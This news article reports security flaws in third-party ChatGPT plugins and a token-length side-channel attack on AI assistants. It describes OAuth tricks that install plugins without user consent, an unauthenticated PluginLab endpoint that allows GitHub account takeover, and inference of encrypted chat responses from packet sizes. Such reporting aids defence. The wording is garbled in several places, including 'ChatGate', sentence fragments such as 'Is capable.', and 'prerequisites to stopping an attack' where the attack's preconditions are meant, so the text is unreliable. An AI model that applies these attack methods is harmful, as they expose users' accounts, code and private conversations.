Third-party ChatGPT plugins may lead to account takeover

 

Cybersecurity researchers have found that third-party plugins available for OpenAI ChatGPT may act as a new attack surface for threat actors looking to gain unauthorized access to sensitive data.

According to new research published by Salt Labs, security flaws found directly within ChatGate and the ecosystem could allow attackers to install malicious plugins without users’ consent and hijack accounts on third-party websites like GitHub.

ChatGPT plugins, as the name suggests, are tools designed to run on top of larger language models (LLM) for the purpose of accessing up-to-date information, running calculations, or accessing third-party services.

OpenAI has also since introduced GPT, which are optimized versions of ChatGPT for specific use cases while reducing third-party service dependencies. Starting March 19, 2024, ChatGPT users will no longer be able to install new plugins or create new conversations with existing plugins.

One of the flaws exposed by Salt Labs involves exploiting the OAuth workflow to trick a user into installing an arbitrary plugin by taking advantage of the fact that ChatGPT does not verify that the user actually initiated the plugin installation. .

This can effectively allow threat actors to intercept and infiltrate all data shared by the victim, which may contain proprietary information.

The cybersecurity firm also discovered issues with PluginLab, which could be weaponized by threat actors to carry out zero-click account takeover attacks, allowing them to take control of an organization’s account on third-party websites like GitHub. and access to their source code repositories.

Security researcher Aviad Carmel explained, “‘auth.pluginlab(.)ai/oauth/authorized’ does not authenticate the request, which means the attacker can insert another member ID (also known as the victim’s) and a Can obtain the code that represents the victim.” “With that code, he can use ChatGPT and access the victim’s GitHub.”

The victim’s member ID can be obtained by querying the endpoint “auth.pluginlab(.)ai/members/requestMagicEmailCode”. There is no evidence that any user data has been compromised using the flaw.

Also found in several plugins, including Kesem AI, is an OAuth redirect manipulation bug that could allow an attacker to steal account credentials associated with the plugin by sending a specially crafted link to the victim.

This development comes just weeks after Imperva detailed two cross-site scripting (XSS) vulnerabilities in ChatGPT that could be chained together to seize control of any account.

In December 2023, security researcher Johann Rehbarger demonstrated how malicious actors could create custom GPTs that could phish for user credentials and transmit the stolen data to an external server.

New remote keylogging attack on AI assistants

These findings also follow new research published this week about an LLM side-channel attack that employed token-length as a covert means to extract encrypted responses from AI assistants on the web.

“LLMs generate and send responses as a series of tokens (similar to words), with each token transmitted from the server to the user,” said a group of academics from Ben-Gurion University and the Offensive AI Research Lab.

“While this process is encrypted, sequential token transmission exposes a new side-channel: the token-length side-channel. Despite encryption, the size of the packet can reveal the length of the token, potentially exposing the network to attackers “Allows us to predict sensitive and confidential information shared in private AI assistant conversations.”

This is accomplished through a token guessing attack that is designed to understand responses in encrypted traffic by training an LLM model that can translate token-length sequences into their natural language syntactic equivalents (i.e., plaintext). Is capable.

In other words, the main idea is to intercept real-time chat responses with the LLM provider, use network packet headers to estimate the length of each token, extract and parse the text segments, and use a custom LLM to estimate the response. To take advantage of.

chatgpt plugins

The two key prerequisites to stopping an attack are an AI chat client running in streaming mode and an adversary that is able to capture the network traffic between the client and the AI ​​chatbot.

To counter the effectiveness of a side-channel attack, it is recommended that companies developing AI assistants implement random padding to obscure the actual length of tokens, transmit tokens in large groups rather than individually, and Send complete responses all at once instead of one at a time. Token-by-token fashion.

The researchers concluded, “Balancing security with usability and performance presents a complex challenge that requires careful consideration.”

Leave a Comment